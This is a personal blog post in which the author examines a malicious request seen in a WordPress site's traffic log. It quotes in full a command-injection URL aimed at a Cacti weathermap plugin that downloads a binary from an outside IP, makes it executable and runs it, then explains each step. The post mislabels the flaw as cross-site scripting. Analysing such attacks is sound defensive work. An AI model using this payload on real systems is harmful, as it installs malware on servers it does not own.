Going through my Wordfence live traffic view is a nice way to see the daily fad of Chinese script kiddies.
WordPress is one of the main targets of people trying to access your data. Obviously if you have a blog you must be sure you run an A+ certified security setup. See my other posts for this:
Security: Maintaining a secure WordPress blog
“A” Rating Security – Strong SSL Security WordPress Blog
Today I got this nice request repeated several times from several China IPs.
https://blog.voina.fr/plugins/weathermap/configs/conn.php?id=wget%20http://182.18.8.69:8088/nkrb;chmod%20777%20nkrb;./nkrb
Let’s make a quick check of the request:
STEP 1: The attack vector:
It seems there is a vulnerability in one of the weather PHP plugins Cacti that can be installed on a WordPress site. The hint is in the URL path:
.../plugins/weathermap/configs/conn.php?id=
It seems that this plugin has a conn.php that is not doing any escaping of parameters so being open to cross site scripting attack. Maybe a known issue no longer valid in newer versions but still valid for a lot of installs.
STEP 2: The attack load
wget%20http://182.18.8.69:8088/nkrb;chmod%20777%20nkrb;./nkrb
This is an interesting attack load that is targeted for Linux. This is a clear indication that the attacker is checking the OS of the target.
The whole string is a sequence of Linux command line items.
First a file is downloaded from a repository machine.
wget http://182.18.8.69:8088/nkrb
The machine is listed as an attack vector site
The downloaded binary is made executable:
chmod 777 nkrb
The binary is executed:
./nkrb
Probably the binary is a ransom-ware or crypto-mining binary.
Contribute to this site maintenance !
This is a self hosted site, on own hardware and Internet connection. The old, down to earth way 🙂. If you think that you found something useful here please contribute. Choose the form below (default 1 EUR) or donate using Bitcoin (default 0.0001 BTC) using the QR code. Thank you !
€1.00